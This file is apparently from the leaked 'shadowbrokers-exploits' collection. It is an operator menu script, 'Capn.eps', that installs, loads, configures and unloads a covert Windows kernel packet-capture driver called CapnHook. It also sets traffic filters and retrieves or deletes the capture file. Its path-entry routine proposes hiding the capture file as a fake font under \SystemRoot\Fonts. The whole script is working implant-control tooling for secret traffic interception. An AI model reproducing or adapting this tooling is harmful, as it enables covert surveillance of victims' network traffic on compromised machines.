shadowbrokers-exploits/windows/Resources/Ep/Scripts/Capn.eps

245 lines
6.3 KiB
PostScript
Raw Normal View History

#--------------------------------------------------------
# File: Capn.eps
#
# Wrapper script for Capn tools
#
# Modifications:
# 8/10/2005 Created.
#--------------------------------------------------------
@echo off;
# defaults
string $driverName;
string $version = "CapnHook 1.0";
string $captureFile;
string $helperFile;
@include "Capn\\getDefaults.eps";
getDefaultPaths($driverName, $captureFile, $helperFile);
# commands
int $installCmdsStart = 1;
int $normalCmdsStart = 9;
int $captureCmdsStart = 13;
string $commands;
$commands[0] = "Quit";
# start of "install" commands
$commands[1] = "Change driver name";
$commands[2] = "Change capture file";
$commands[3] = "Install tools";
$commands[4] = "Uninstall tools";
$commands[5] = "Load driver";
$commands[6] = "Unload driver";
$commands[7] = "Verify install";
$commands[8] = "Verify driver is running";
# start of "config" commands
$commands[9] = "Get current status";
$commands[10] = "Get packet filter";
$commands[11] = "Set packet filter";
$commands[12] = "Set max capture file size";
# start of "capture file" commands
$commands[13] = "Retreive packet capture file";
$commands[14] = "Delete packet capture file";
while (true) {
echo "\r\n\r\n";
echo "$version\r\n";
# Print the current configuration
echo "Current Configuration:";
echo "\t Driver Name : $driverName";
echo "\tCapture File : $captureFile";
echo "";
# print the command list
int $i=0;
while ($i < sizeof($commands)) {
if ($i == $installCmdsStart) {
echo "";
echo "Installation commands:";
}
else if ($i == $normalCmdsStart) {
echo "";
echo "Configuration commands";
}
else if ($i == $captureCmdsStart) {
echo "";
echo "Capture File commands:";
}
echo "($i). $commands[$i]";
$i++;
}
echo "";
int $choice = GetInput("Enter the desired option");
if ($choice == 0) {
# quit
return true;
}
else if ($choice == 1) {
# Change driver name
echo "Current driver name = '$driverName'";
$driverName = GetInput("Enter new driver name");
}
else if ($choice == 2) {
# Change capture file name
GetCaptureFile($captureFile);
}
else if ($choice == 3) {
# install driver
if (`script Capn\\Install.eps $driverName "$captureFile"`) {
echo "INSTALL SUCCESS";
echo "";
echo "NOTE: The driver has not been loaded";
}
else {
echo "**** INSTALL FAILED ****";
}
}
else if ($choice == 4) {
# uinstall driver
if (`script Capn\\Uninstall.eps $driverName $helperFile`) {
echo "UNINSTALL SUCCESS";
echo "";
echo "**** NOTE: The capture file must be deleted seperately ****";
}
else {
echo "**** UNINSTALL FAILED ****";
}
}
else if ($choice == 5) {
# load the driver
if (prompt "Load the driver ($driverName)?") {
@echo on;
`driverload -name $driverName`;
@echo off;
}
}
else if ($choice == 6) {
# unload the driver
if (prompt "Unload the driver ($driverName)?") {
if (`script Capn\\DriverUnload.eps $driverName $helperFile`) {
echo "UNLOAD OF DRIVER SUCCESSFULL";
}
else {
echo "**** UNABLE TO UNLOAD DRIVER ****";
}
}
}
else if ($choice == 7) {
# verify install
#@echo on;
if (`script Capn\\VerifyInstall.eps $driverName $helperFile`) {
echo "VERIFICATION SUCCESSFULL";
}
else {
echo "**** UNABLE TO VERIFY INSTALL ****";
}
}
else if ($choice == 8) {
# verify running
if (`script Capn\\VerifyRunning.eps $driverName $helperFile`) {
echo "VERIFICATION SUCCESSFULL";
}
else {
echo "**** UNABLE TO VERIFY DRIVER IS RUNNING ****";
}
### CONFIG COMMANDS ###
}
else if ($choice == 9) {
# get the current status
`script Capn\\GetStatus.eps $driverName "$captureFile"`;
}
else if ($choice == 10) {
# get the current filter
`script Capn\\GetFilter.eps $driverName $helperFile`;
} else if ($choice == 11) {
# set the current filter
if (`script Capn\\SetFilter.eps $driverName $helperFile`) {
echo "SET OF FILTER SUCCESSFULL";
}
else {
echo "**** UNABLE TO SET NEW FILTER ****";
echo "";
}
echo "NOTE: If the driver is already loaded, you must unload then load";
echo " the driver to start capturing traffic using the new filter";
}
else if ($choice == 12) {
# set the maximum capture file size
if (`script Capn\\SetMaxFileSize.eps $driverName`) {
echo "SET OF MAX CAPTURE FILE SIZE SUCCESSFULL";
echo "";
echo "NOTE: Driver must STOPPED and RESTARTED";
echo " for this change to take effect.";
} else {
echo "**** UNABLE TO SET MAXIMUM CAPTURE FILE SIZE ****";
}
### CONFIG COMMANDS ###
### CONTROL COMMANDS ###
}
else if ($choice == 13) {
# get packet capture file
@echo on;
if (`script Capn\\HandleCapture.eps $driverName $helperFile get "$captureFile"`) {
echo "GET OF CAPTURE FILE SUCCESSFULL";
}
else {
echo "**** UNABLE TO GET CAPTURE FILE ****";
}
}
else if ($choice == 14) {
# delete packet capture file
if (`script Capn\\HandleCapture.eps $driverName $helperFile delete "$captureFile"`) {
echo "DELETE OF CAPTURE FILE SUCCESSFULL";
}
else {
echo "**** UNABLE TO DELETE CAPTURE FILE ****";
}
}
else {
# invalid choice
echo "*** Invalid choice ***";
}
pause;
}
return true;
#---------------------------------------------------------------------------
Sub GetCaptureFile(REF string $captureFile)
{
echo "Enter a new capture file in kernel-mode form:";
echo " eg. '\\SystemRoot\\Fonts\\vga_ds.tff' or '\\??\\D:\\temp\\~fg34.tmp'";
while (true) {
# get the path -- making sure that it's at least in a valid form
$captureFile = GetInput("Enter a Capture File");
string $parts = Split("\\", $captureFile);
if ((sizeof($parts) < 3) || ($parts[0] != "") || (($parts[1] != "SystemRoot") && ($parts[1] != "??"))) {
echo "* Invalid capture path";
} else {
# good capture path
break;
}
}
return true;
}
# end GetCaptureFile